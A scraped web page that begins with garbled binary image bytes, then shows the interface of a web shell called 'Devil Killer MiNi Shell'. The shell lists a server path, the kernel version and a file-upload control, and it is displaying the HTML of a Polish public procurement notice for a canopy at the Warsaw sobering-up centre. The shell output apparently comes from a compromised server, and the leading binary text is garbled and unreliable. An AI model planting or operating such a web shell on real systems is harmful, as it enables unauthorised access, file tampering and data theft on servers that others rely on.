JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240711/0040818401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Rozbudowa budynku Stołecznego Ośrodka dla Osób Nietrzeźwych&#34;(rozbudowa w oparciu o dostawę i montaż zadaszenia nad wejściem do budynku gdzie przyjmowane są osoby doprowadzone do DIW) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Stołeczny Ośrodek dla Osób Nietrzeźwych</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">SOdON</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 017319085</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolska 2/4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-045</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(22) 838 84 07, (22) 637 49 41</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(22) 636 55 97</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@sodon.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://sodon.bip.um.warszawa.pl/default.htm</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Rozbudowa budynku Stołecznego Ośrodka dla Osób Nietrzeźwych&#34;(rozbudowa w oparciu o dostawę i montaż zadaszenia nad wejściem do budynku gdzie przyjmowane są osoby doprowadzone do DIW) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2d1f7fe3-d4b8-4441-8a63-4c8b541f2387</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00408184</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2d1f7fe3-d4b8-4441-8a63-4c8b541f2387 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">portal dostępowy e-Zamówienia, https://sodon.bip.warszawa.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oferty, wnioski o dopuszczenie do<br/>udziału w postępowaniu , oświadczenia oraz inne dokumenty powinny być składane /przesyłane przy użyciu środków komunikacji<br/>elektronicznej zgodnie z art. 61 ust. 1 ustawy pzp</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://sodon.bip.warszawa.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>- administratorem Pani/Pana danych osobowych jest Stołeczny Ośrodek dla Osób Nietrzeźwych z siedzibą przy ulicy Kolskiej 2/4 w<br/>Warszawie;<br/>- kontakt do inspektora danych osobowych w Stołecznym Ośrodku dla Osób Nietrzeźwych kontakt mail: iod@sodon.pl *;<br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego w postępowaniu na potrzeby postępowania pn.:<br/>- „Rozbudowa budynku Stołecznego Ośrodka dla Osób Nietrzeźwych”.<br/>Nr sprawy: DAD.3130.15.2024.DHA;<br/>- odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 78 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.),<br/>dalej „ustawa Pzp”;<br/>- Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>- w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>- posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>- nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAD.3130.15.2024.DHA</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ogólna charakterystyka budynku.<br/>Budynek wykorzystywany w sposób następujący:<br/>1) Piwnica – pomieszczenia techniczne, magazynowe i warsztatowe, kotłownia,<br/>pomieszczenia składnicy akt, szatnie dla pracowników obiektu, sala<br/>szkoleniowa,<br/>2) Parter – pomieszczenia biurowe oraz pomieszczenia przeznaczone dla osób<br/>wychodzących z uzależnień, izba przyjęć, gabinety lekarskie, łazienki,<br/>pomieszczenia gospodarcze, depozyt,<br/>3) I piętro – gabinety pracowników, sale pacjentów, łazienka,<br/>4) II piętro – pomieszczenia zajmowane przez Samodzielny Wojewódzki Zespół<br/>Publicznych Zakładów Psychiatrycznej Opieki Zdrowotnej w Warszawie – poza<br/>zakresem prowadzonego postępowania,<br/>5) Poddasze nieużytkowe – maszynownia dźwigu.<br/>Podstawowe dane techniczne budynku:<br/>- powierzchnia zabudowy - 1040 m2,<br/>- powierzchnia użytkowa łącznie - 4180 m2 (łącznie z pomieszczeniami Samodzielnego Wojewódzkiego Zespołu<br/>Publicznych Zakładów Psychiatrycznej opieki Zdrowotnej w Warszawie nie będących przedmiotem postepowania),<br/>- kubatura - 12725 m3 ( w tym kubatura brutto pomieszczeń objętych opracowaniem ok. 10 900,00m3),<br/>- liczba kondygnacji nadziemnych – 3 (w tym 2 objęte przedmiotem postepowania),<br/>- liczba kondygnacji podziemnych - 1,<br/>- szerokość elewacji frontowej - 14,6 m,<br/>- długość - 72,8 m,<br/>- wysokość - 10,9 m.<br/>Opis konstrukcji obiektu.<br/>Budynek posiada 3 kondygnacje nadziemne, poddasze nieużytkowe oraz podpiwniczenie.<br/>Konstrukcja budynku tradycyjna.<br/>1) Ściany konstrukcyjne zewnętrzne, murowane z cegły pełnej:<br/>− Piwnice o grubości 51 cm,<br/>− Kondygnacje nadziemne o grubości 38 cm,<br/>2) Ściany konstrukcyjne wewnętrzne, murowane z cegły pełnej:<br/>- Piwnice grubości 38 i 51 cm,<br/>- Kondygnacje nadziemne grubości 25 i 38 cm,<br/>3) Ściany działowe murowane grubości 6, 12, i 18 cm,<br/>4) Klatki schodowe żelbetowe wylewane,<br/>5) Stropy z płyt DMS,<br/>6) Stropodach dwuspadowy, wentylowany – płyty prefabrykowane ułożone na belkach<br/>DMS, kryty papą.<br/>1. Przedmiot zamówienia ma być wykonany zgodnie z obowiązującymi w zakresie jego wykonania standardami, normami i<br/>przepisami ustawy Prawo Budowlane oraz aktami wykonawczymi.<br/>2. Przedmiot zamówienia obejmuje wykonanie następujących czynności:<br/>1) przedłożenie Zamawiającemu przed rozpoczęciem prac harmonogramu realizacji zadania inwestycyjnego (harmonogram<br/>musi spełniać wymagania Zamawiającego opisane w punkcie 4),<br/>2) formalnego przejęcia terenu budowy,<br/>3) demontaż i utylizacja istniejących elementów instalacji, jeżeli nie mogą być one wykorzystane do realizacji przedmiotu<br/>zamówienia,<br/>4) zakup i dostawa na teren budowy niezbędnych do wykonania przedmiotu zamówienia materiałów i urządzeń,<br/>5) wykonanie robót instalacyjnych i budowlanych przewidzianych w dokumentacji przetargowej zgodnie z dokumentacją<br/>projektową i przyjętym przez Zamawiającego harmonogramem,<br/>6) udział w komisyjnych odbiorach prac oraz w odbiorze końcowym inwestycji.<br/>3. Zakres czynności inwestycji w ramach przedmiotu zamówienia:<br/>1) „Dostawa i montaż zadaszenia nad wejściem do budynku Stołecznego Ośrodka dla Osób Nietrzeźwych, gdzie są<br/>przyjmowane osoby doprowadzone do wytrzeźwienia”.<br/>2) rozbudowa, w ramach zadania wskazanego w pkt. 1, budynku Stołecznego Ośrodka dla Osób Nietrzeźwych polegająca<br/>na dostawie i montażu zadaszenia nad wejściem do budynku Stołecznego Ośrodka dla Osób Nietrzeźwych, gdzie są<br/>przyjmowane osoby doprowadzone do wytrzeźwienia,<br/>3) uzgadnianie terminów i koordynacja prac związanych z przenoszeniem istniejących instalacji, które z uwagi na<br/>obowiązujące Zamawiającego umowy muszą być przenoszone w uzgodnieniu z Wykonawcami tych umów.<br/>4. Wykonawca zrealizuje przedmiot umowy w zakresie i w sposób określony w dokumentacji projektowej oraz specyfikacji<br/>technicznej wykonania i odbioru robót budowlanych (opracowania wykonane przez firmę PRZEARCHITEKCI –<br/>PRACOWNIA PROJEKTOWA znajdują się w załączniku nr 1 do SWZ.<br/>5. Ewentualne zastosowane w opisie przedmiotu zamówienia nazwy producentów i nazw własnych produktów służą tylko i<br/>wyłącznie określeniu parametrów standardów jakościowych, technicznych i funkcjonalnych oraz doprecyzowaniu przedmiotu<br/>zamówienia, a nie wyłonieniu lub preferowaniu konkretnego producenta czy dostawcy.<br/>6. Zamawiający dopuszcza składanie ofert równoważnych, to jest oferujących produkty posiadające parametry techniczne i<br/>jakościowe co najmniej takie same jak produkty podane za pomocą nazw producenta w dokumentacji opisującej przedmiot<br/>zamówienia. Ofertą równoważną jest przedmiot o takich samych lub lepszych parametrach technicznych, jakościowych,<br/>funkcjonalnych, spełniający minimalne parametry określone przez Zamawiającego. Zamawiający informuje, iż w razie gdy w<br/>opisie przedmiotu zamówienia znajdują się znaki towarowe, za ofertę równoważną uznaje się ofertę spełniającą parametry<br/>indywidualnie wskazanego asortymentu określone przez jego producenta. Wykonawca, który powołuje się na rozwiązania<br/>równoważne do opisywanych przez Zamawiającego, jest obowiązany wykazać, że oferowany przez niego towar spełnia<br/>wymagania określone przez Zamawiającego. W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty,<br/>opisujące parametry techniczno-jakościowe, wymagane prawem certyfikaty i inne dokumenty, dopuszczające dane<br/>materiały (wyroby) do użytkowania oraz pozwalające jednoznacznie stwierdzić, że są one równoważne, pod rygorem<br/>odrzucenia oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71245000-7 - Plany zatwierdzające, rysunki robocze i specyfikacje</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45316200-7 - Instalowanie urządzeń sygnalizacyjnych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-13</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie wybrana ta oferta, która zgodnie z powyższymi kryteriami oceny ofert<br/>uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu wg wzoru:<br/>S = PK1+PK2+PK3</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji dla wszystkich robót budowlanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie terminu realizacji zadania inwestycyjnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu:<br/>1) zdolności do występowania w obrocie gospodarczym. Zamawiający nie wyznacza szczegółowego warunku udziału w tym<br/>zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie wyznacza szczegółowego warunku udziału w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej. Zamawiający nie wyznacza szczegółowego warunku udziału w tym zakresie.<br/>4) zdolność techniczna lub zawodowa:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że dysponują następującymi osobami zdolnymi do<br/>realizacji przedmiotu zamówienia tj.:<br/>a) Kierownikiem budowy – posiadającym uprawnienia w specjalności konstrukcyjno–budowlanej do kierowania robotami<br/>budowlanymi bez ograniczeń (potwierdzony wpisem do rejestru zawodowego prowadzonego przez Głównego Inspektora<br/>Nadzoru Budowlanego). Niezbędne wymagane doświadczenie to kierowanie w ciągu ostatnich 5 lat robotami budowlanymi<br/>przy realizacji, co najmniej jednej roboty polegającej na wybudowaniu, lub/i przebudowaniu, lub/i rozbudowaniu obiektu o<br/>wartości zadania (wartość całej roboty budowlanej) minimalnej 400 000,00 zł (słownie: czterysta tysięcy złotych).<br/>b) Kierownikiem w branży instalacyjnej - wymagane są uprawnienia budowlane osoby, która posiada uprawnienia<br/>budowlane do kierowania robotami budowlanymi – w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych bez ograniczeń, który w ciągu ostatnich 5 lat kierował robotami budowlanymi wraz z<br/>instalacjami wewnętrznymi przy realizacji, co najmniej jednej roboty polegającej na wybudowaniu, lub/i przebudowaniu, lub/i rozbudowaniu obiektu o wartości zadania (wartość całej roboty budowlanej ze wszystkimi branżami) minimum 100 000,00 zł<br/>(słownie: sto tysięcy złotych).<br/>c) Kierownikiem w branży instalacyjnej - wymagane są uprawnienia budowlane osoby, która posiada uprawnienia<br/>budowlane do kierowania robotami budowlanymi – w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, który w ciągu ostatnich 5 lat<br/>kierował robotami budowlanymi wraz z instalacjami wewnętrznymi przy realizacji co najmniej jednej roboty polegającej na<br/>wybudowaniu, lub/i przebudowaniu, lub/i rozbudowaniu obiektu o wartości zadania (wartość całej roboty budowlanej ze<br/>wszystkimi branżami) minimum 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych).<br/>2.1. Wykonawca wykaże niezbędną wiedzę i doświadczenie, tzn. w okresie ostatnich 5 lat<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od<br/>charakteru prawnego łączących go z nimi stosunków prawnych.<br/>3. Warunek udziału w postępowaniu dotyczący niezbędnej wiedzy i doświadczenia, musi być spełniony przez Wykonawcę<br/>samodzielnie, lub przez minimum jeden podmiot udostępniający (podwykonawcę) wiedzę i doświadczenie samodzielnie, a w<br/>przypadku podmiotów występujących wspólnie, samodzielnie przez minimum jednego z Wykonawców występujących<br/>wspólnie.<br/>4. Wymagania Zamawiającego dotyczące zatrudnienia przez Wykonawcę lub podwykonawcę osób na podstawie umowy o<br/>pracę (art. 95 ust. 1 ustawy PZP).<br/>1) Zgodnie z art. 95 ust. 1 ustawy PZP Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na<br/>podstawie umowy o pracę, osób wykonujących następujące czynności w zakresie realizacji zamówienia pracowników<br/>niższego szczebla technicznego odpowiedzialnych za organizowanie i realizację robót budowlanych oraz pracowników<br/>fizycznych odpowiedzialnych za bezpośrednie wykonywanie i realizację robót budowlanych.<br/>2) Wykonawca zobowiązuje się do zatrudnienia pracowników wykonujący czynności w zakresie określonym w pkt 1, będą<br/>zatrudnieni na umowę o 